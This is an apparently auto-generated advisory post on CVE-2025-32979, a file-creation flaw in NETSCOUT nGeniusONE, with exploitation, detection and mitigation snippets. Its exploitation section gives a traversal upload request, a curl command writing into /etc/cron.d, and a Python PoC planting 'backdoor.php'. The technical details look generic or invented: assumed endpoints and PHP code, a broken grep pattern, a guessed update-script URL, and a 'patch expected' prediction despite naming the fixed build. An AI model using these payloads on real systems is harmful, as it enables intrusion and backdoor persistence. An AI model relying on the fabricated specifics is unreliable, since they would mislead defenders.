NETSCOUT nGeniusONE, Arbitrary File Creation, CVE-2025-32979 (Critical)

Listen to this Post

How CVE-2025-32979 Works

CVE-2025-32979 is an arbitrary file creation vulnerability in NETSCOUT nGeniusONE versions before 6.4.0 b2350. Authenticated attackers can exploit improper input validation in file upload or directory traversal functions to create malicious files in unintended locations. This could lead to remote code execution (RCE), data manipulation, or denial-of-service (DoS) by overwriting critical system files. The flaw stems from insufficient path sanitization, allowing attackers to bypass restrictions using crafted payloads like `../../` sequences.

DailyCVE Form

Platform: NETSCOUT nGeniusONE
Version: <6.4.0 b2350
Vulnerability: Arbitrary File Creation
Severity: Critical
Date: 05/27/2025

Prediction: Patch expected by 06/15/2025

What Undercode Say:

Exploitation:

1. Directory Traversal Payload:

POST /upload HTTP/1.1
Host: target
Content-Disposition: form-data; name="file"; filename="../../malicious.php"

2. File Overwrite:

curl -X POST -F "[email protected]" "http://target/api/upload?dest=../../etc/cron.d"

Detection:

grep -r "file_put_contents(..." /var/www/ngeniusone

Mitigation:

1. Input Sanitization:

$filename = basename($_FILES['file']['name']); // Prevent path traversal

2. Patch Upgrade:

wget https://download.netscout.com/ngeniusone/6.4.0/b2350/update.sh
chmod +x update.sh && ./update.sh

Log Analysis:

cat /var/log/nginx/access.log | grep -E "../|%2e%2e"

Firewall Rule:

iptables -A INPUT -p tcp --dport 80 -m string --string "../" --algo bm -j DROP

Exploit PoC (Python):

import requests
files = {'file': ('../../backdoor.php', open('backdoor.php', 'rb'))}
r = requests.post("http://target/upload", files=files)
print(r.status_code)

Post-Patch Verification:

sha256sum /opt/ngeniusone/bin/file_uploader | grep EXPECTED_HASH

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top